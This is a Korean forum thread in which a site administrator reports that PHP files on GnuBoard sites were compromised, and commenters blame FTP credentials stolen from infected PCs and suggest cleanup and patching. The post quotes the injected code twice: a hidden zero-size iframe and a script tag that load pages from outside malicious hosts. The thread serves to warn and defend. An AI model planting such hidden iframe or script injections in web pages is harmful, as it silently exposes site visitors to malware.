FTP계정에 올리는 컴퓨터는 꼭 백신을 설치하여야 합니다. 정보
FTP계정에 올리는 컴퓨터는 꼭 백신을 설치하여야 합니다.본문
얼마전 저희가 관리하던 단체의 그누보드에서 이상한 점을 발견했습니다.
모든 php에 md5로 이상한 문자열이 들어 있는것을 보았습니다.
또한 저희가 관리하지 않는 단체에 그누보드에서도 그러한 현상을 발견하였습니다.
eval(md5로 싸여있고, 페이지에서 보면 아래와 같은 코드가 등록되었습니다.
보안관련 심각한 결함이 있는 것으로 보이는데요.
어떤 문제인지 어떻게 해결해야하는지 긴급한 조치가 있어야 할것 같습니다.
iframe frameborder="0" onload="if (!this.src){ this.src='http://smert-test.ru:8080/index.php'; this.height='0'; this.width='0';}" >vwybainbqgvjsrmjxyrsllxvcboebxw</iframe><script src=http://picshic.com/buxxx/25.php ></script>
윈도우상에서 감염된 PC를 통해서 php파일에 감염된것 같습니다.
FTP를 다루는 컴퓨터는 꼭 백신을 설치하시기 바랍니다.
모든 php에 md5로 이상한 문자열이 들어 있는것을 보았습니다.
또한 저희가 관리하지 않는 단체에 그누보드에서도 그러한 현상을 발견하였습니다.
eval(md5로 싸여있고, 페이지에서 보면 아래와 같은 코드가 등록되었습니다.
어떤 문제인지 어떻게 해결해야하는지 긴급한 조치가 있어야 할것 같습니다.
iframe frameborder="0" onload="if (!this.src){ this.src='http://smert-test.ru:8080/index.php'; this.height='0'; this.width='0';}" >vwybainbqgvjsrmjxyrsllxvcboebxw</iframe><script src=http://picshic.com/buxxx/25.php ></script>
윈도우상에서 감염된 PC를 통해서 php파일에 감염된것 같습니다.
FTP를 다루는 컴퓨터는 꼭 백신을 설치하시기 바랍니다.
추천
1
1
댓글 7개
저도 이런 경험이 있어서 말씀드리면,
이런경우, 대부분 FTP 계정으로 침입했을 경우이던데요.....
신종바이러스인가 뭔가 그러면서, 사용하는 컴퓨터에서 이미 바이러스가 걸려있으면, 사용하는 FTP를 이용해서 서버로 침입합니다.
그렇게 서버로 침입이 되면, 서버의 관리권한 최고권한을 가지게 되고, 이렇게 최고 권한을 가지게 되면,
그누보드를 비롯한 서버에서 돌아가는 모든 사이트의 폴더권한이 변경이 되고, 이렇게 됨으로써, 주요파일에 아이프레임이라든지, 자바스크립트 문구들이 추가됩니다..
이렇게 되면, 모든 파일을 검사하고, 수정된 파일을 원상복구 하고, 다시 업로드 조치 해야 됩니다.
만약, 어느하나의 파일이라도 수정이 되지 않았다면, 또다시 알게모르게 이상한 것들이 추가됩니다.
그리고, 바이러스 검사를 하고, 서버의 보안업데이트를 해야되고, 사용하는 관리계정의 비밀번호를 모두 변경해야 하고,.....아...정말 할일이 많더군요...
이문제는 그누보드의 문제가 아닌것으로 저는 판단합니다.
이유는 똑같은 서버에 그누보드 3개의 사이트가 돌아 가고 있는데, 두곳은 FTP를 열지 않았던 곳이고,
한곳은 FTP를 열었던 곳인데, FTP를 열었던 곳은 이문제로 참으로 고생했었고, 나머지 두곳은 아무런 문제가 없었습니다.
FTP를 사용하는 컴퓨터의 관리가 중요할듯 합니다.
이런경우, 대부분 FTP 계정으로 침입했을 경우이던데요.....
신종바이러스인가 뭔가 그러면서, 사용하는 컴퓨터에서 이미 바이러스가 걸려있으면, 사용하는 FTP를 이용해서 서버로 침입합니다.
그렇게 서버로 침입이 되면, 서버의 관리권한 최고권한을 가지게 되고, 이렇게 최고 권한을 가지게 되면,
그누보드를 비롯한 서버에서 돌아가는 모든 사이트의 폴더권한이 변경이 되고, 이렇게 됨으로써, 주요파일에 아이프레임이라든지, 자바스크립트 문구들이 추가됩니다..
이렇게 되면, 모든 파일을 검사하고, 수정된 파일을 원상복구 하고, 다시 업로드 조치 해야 됩니다.
만약, 어느하나의 파일이라도 수정이 되지 않았다면, 또다시 알게모르게 이상한 것들이 추가됩니다.
그리고, 바이러스 검사를 하고, 서버의 보안업데이트를 해야되고, 사용하는 관리계정의 비밀번호를 모두 변경해야 하고,.....아...정말 할일이 많더군요...
이문제는 그누보드의 문제가 아닌것으로 저는 판단합니다.
이유는 똑같은 서버에 그누보드 3개의 사이트가 돌아 가고 있는데, 두곳은 FTP를 열지 않았던 곳이고,
한곳은 FTP를 열었던 곳인데, FTP를 열었던 곳은 이문제로 참으로 고생했었고, 나머지 두곳은 아무런 문제가 없었습니다.
FTP를 사용하는 컴퓨터의 관리가 중요할듯 합니다.
서버의 최고관리권한을 가지게 되는건 아닙니다.
현재 알려진바로는 파일변조정도 입니다. 물론 ftp비번이 유출된 경우고 파일변조가 가능하니 서버해킹시도도 가능하다고 봅니다.
클라이언트컴의 보안패치 및 바이러스.악성코드 제거 ftp비번변경등의 빠른 조취를 취하는게 좋겠지요..
현재 알려진바로는 파일변조정도 입니다. 물론 ftp비번이 유출된 경우고 파일변조가 가능하니 서버해킹시도도 가능하다고 봅니다.
클라이언트컴의 보안패치 및 바이러스.악성코드 제거 ftp비번변경등의 빠른 조취를 취하는게 좋겠지요..
감사합니다.
리포트를 찾았습니다.
http://wepawet.iseclab.org/view.php?type=js&hash=dd6d35d59090487e06e482cb31d6404d&t=1255740814
ftp사용하시는분들은 백신 꼭 깔고 사용하시길...
리포트를 찾았습니다.
http://wepawet.iseclab.org/view.php?type=js&hash=dd6d35d59090487e06e482cb31d6404d&t=1255740814
ftp사용하시는분들은 백신 꼭 깔고 사용하시길...
백신만 깔면 안되죠. 윈도우즈도 항상 최신버젼으로 패치를 해야 합니다.
라이센스가 없는 윈도의 경우 보안패치를 설치하지 못해서, 해킹을 당할 수 있습니다.
개발에 쓰는 컴터는 윈도 라이센스를 정품으로 해서 항상 보안 업데이트 해야 합니다.
라이센스가 없는 윈도의 경우 보안패치를 설치하지 못해서, 해킹을 당할 수 있습니다.
개발에 쓰는 컴터는 윈도 라이센스를 정품으로 해서 항상 보안 업데이트 해야 합니다.
아니,
정품 라이센스에 악성코드 항상 자주 치료하고 방화벽 설정 잘해놓고 백신 잘 설치해 있고,
ftp로 확인해서 감염파일 다 삭제해도 또 문제가 생기는 거 같던데요?
또다른 길이 있지않나 싶습니다.
정품 라이센스에 악성코드 항상 자주 치료하고 방화벽 설정 잘해놓고 백신 잘 설치해 있고,
ftp로 확인해서 감염파일 다 삭제해도 또 문제가 생기는 거 같던데요?
또다른 길이 있지않나 싶습니다.
서버의 kernel은 관리하시는지요?
root kit(root 권한 가져가는 프로그램)이 올라가도
동작 안하는 커널 버젼으로 업~ 하셔야 합니다.
root kit(root 권한 가져가는 프로그램)이 올라가도
동작 안하는 커널 버젼으로 업~ 하셔야 합니다.
아빠불당님 그렇게 친절하게 답변해주셔서 너~무 감사해요. ^^
